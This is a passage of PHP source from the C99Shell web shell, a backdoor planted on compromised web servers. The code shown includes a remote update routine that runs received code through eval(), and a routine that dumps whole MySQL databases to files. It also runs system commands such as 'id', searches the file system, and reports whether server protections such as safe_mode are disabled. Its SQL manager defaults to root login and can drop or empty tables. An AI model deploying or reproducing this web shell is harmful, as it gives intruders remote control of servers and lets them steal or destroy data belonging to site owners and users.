     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
    }
   }
   else {return "New version are available: ".$string[1];}
  }
  elseif ($data{0} == "\x99" and $data{1} == "\x04" ) {eval($string); return 1;}
  else {return "Error in protocol: segmentation failed! (".$data." ) ";}
 }
}
}
if (!function_exists("mysql_dump" ))
{
function mysql_dump($set)
{
 global $shver;
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 $ret["err"] = array();
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource." );}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 if (empty($nl2br)) {$nl2br = 0;}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (empty($file))
 {
  $file = $tmpdir."dump_".getenv("SERVER_NAME" )."_".$db."_".date("d-m-Y-H-i-s" ).".sql";
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (sizeof($tabs) == 0)
 {
  // retrive tables-list
  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 $out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info()." ) running on ".getenv("SERVER_ADDR" )." (".getenv("SERVER_NAME" )." )"."
# Date: ".date("d.m.Y H:i:s" )."
# DB: \"".$db."\"
#---------------------------------------------------------
";
 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
  if ((in_array($tab,$onlytabs)) or (!$c))
  {
   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
   // recieve query for create table structure
   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
   if (!$res) {$ret["err"][] = mysql_smarterror();}
   else
   {
    $row = mysql_fetch_row($res);
    $out .= $row["1"].";\n\n";
    // recieve table variables
    $res = mysql_query("SELECT * FROM `$tab`", $sock);
    if (mysql_num_rows($res) > 0)
    {
     while ($row = mysql_fetch_assoc($res))
     {
      $keys = implode("`, `", array_keys($row));
      $values = array_values($row);
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
      $values = implode("', '", $values);
      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
      $out .= $sql;
     }
    }
   }
  }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
  $fp = fopen($file, "w" );
  if (!$fp) {$ret["err"][] = 2;}
  else
  {
   fwrite ($fp, $out);
   fclose ($fp);
  }
 }
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $out;
}
}
if (!function_exists("mysql_buildwhere" ))
{
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}
 $result = "";
 foreach($array as $k=>$v)
 {
  $value = "";
  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  $value .= "'".addslashes($v)."'";
  if (!empty($functs[$k])) {$value .= " )";}
  $result .= "`".$k."` = ".$value.$sep;
 }
 $result = substr($result,0,strlen($result)-strlen($sep));
 return $result;
}
}
if (!function_exists("mysql_fetch_all" ))
{
function mysql_fetch_all($query,$sock)
{
 if ($sock) {$result = mysql_query($query,$sock);}
 else {$result = mysql_query($query);}
 $array = array();
 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 mysql_free_result($result);
 return $array;
}
}
if (!function_exists("mysql_smarterror" ))
{
function mysql_smarterror($type,$sock)
{
 if ($sock) {$error = mysql_error($sock);}
 else {$error = mysql_error();}
 $error = htmlspecialchars($error);
 return $error;
}
}
if (!function_exists("mysql_query_form" ))
{
function mysql_query_form()
{
 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 if ((!$submit) or ($sql_act))
 {
  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  if ($tbl_struct)
  {
   echo "<td valign=\"top\"><b>Fields:</b><br>";
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
   echo "</td></tr></table>";
  }
 }
 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db" ))
{
function mysql_create_db($db,$sock="" )
{
 $sql = "CREATE DATABASE `".addslashes($db)."`;";
 if ($sock) {return mysql_query($sql,$sock);}
 else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse" ))
{
function mysql_query_parse($query)
{
 $query = trim($query);
 $arr = explode (" ",$query);
 /*array array()
 {
  "METHOD"=>array(output_type),
  "METHOD1"...
  ...
 }
 if output_type == 0, no output,
 if output_type == 1, no output if no error
 if output_type == 2, output without control-buttons
 if output_type == 3, output with control-buttons
 */
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $result = array();
 $op = strtoupper($arr[0]);
 if (is_array($types[$op]))
 {
  $result["propertions"] = $types[$op];
  $result["query"]  = $query;
  if ($types[$op] == 2)
  {
   foreach($arr as $k=>$v)
   {
    if (strtoupper($v) == "LIMIT" )
    {
     $result["limit"] = $arr[$k+1];
     $result["limit"] = explode(",",$result["limit"]);
     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
     unset($arr[$k],$arr[$k+1]);
    }
   }
  }
 }
 else {return FALSE;}
}
}
if (!function_exists("c99fsearch" ))
{
function c99fsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== FALSE)
 {
  if($f != "." && $f != ".." )
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {c99fsearch($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
}
if ($act == "gofile" ) {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
 global $gzipencode,$ft;
 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad" )))
 {
  $v = @ob_get_contents();
  @ob_end_clean();
  @ob_start("ob_gzHandler" );
  echo $v;
  @ob_end_flush();
 }
}
function c99shexit()
{
 onphpshutdown();
 exit;
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT" );
header("Last-Modified: ".gmdate("D, d M Y H:i:s" )." GMT" );
header("Cache-Control: no-store, no-cache, must-revalidate" );
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache" );
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir" );
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get("safe_mode" ) or strtolower(@ini_get("safe_mode" )) == "on" )
{
 $safemode = TRUE;
 $hsafemode = "<font color=red>ON (secure)</font>";
}
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
$v = @ini_get("open_basedir" );
if ($v or strtolower($v) == "on" ) {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE" );
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string",$highlight_string); //#DD0000
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST" ); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id" ),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath("." );} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
else
{
 $wd = FALSE;
 $wdt = "<font color=red>[ Read-Only ]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
if (is_callable("disk_free_space" ))
{
 $free = disk_free_space($d);
 $total = disk_total_space($d);
 if ($free === FALSE) {$free = 0;}
 if ($total === FALSE) {$total = 0;}
 if ($free < 0) {$free = 0;}
 if ($total < 0) {$total = 0;}
 $used = $total-$free;
 $free_percent = round(100/($total/$free),2);
 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z" ) as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\" );}
  if ($bool)
  {
   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\" )."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"" ).">[ ";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "<font color=green>".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
}
if (count($quicklaunch) > 0)
{
 foreach($quicklaunch as $item)
 {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d.".." );
  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
 }
}
echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "" ) {$act = $dspact = "ls";}
if ($act == "sql" )
{
 $sql_surl = $surl."act=sql";
 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
 $sql_surl .= "&";
 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
 if ($sql_server)
 {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = FALSE;}
 echo "<b>SQL Manager:</b><br>";
 if (!$sql_sock)
 {
  if (!$sql_server) {echo "NO CONNECTION";}
  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
 }
 else
 {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&" );
  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus" );
  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars" );
  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes" );
  $sqlquicklaunch[] = array("Logout",$surl."act=sql" );
  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ()." ) running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\" )</b><br>";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  echo "</center>";
 }
 echo "</td></tr><tr>";
 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
 else
 {
  //Start left panel
  if (!empty($sql_db))
  {
   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0]." )</br></b>"; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
   }
  }
  else
  {
   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (".$c." )</option>";
    echo $dbs;
   }
   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  }
  //End left panel
  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  //Start center panel
  $diplay = TRUE;
  if ($sql_db)
  {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db)." ).<br>";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
   echo "</b></center>";
   $acts = array("","dump" );
   if ($sql_act == "tbldrop" ) {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblempty" ) {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
   elseif ($sql_act == "tbldump" ) {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
   elseif ($sql_act == "tblcheck" ) {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tbloptimize" ) {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblrepair" ) {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblanalyze" ) {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "deleterow" ) {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
   elseif ($sql_tbl_act == "insert" )
   {
    if ($sql_tbl_insert_radio == 1)
    {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= " )";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
   }
   if ($sql_act == "query" )
   {
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
   }
   if (in_array($sql_act,$acts))
   {
    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input 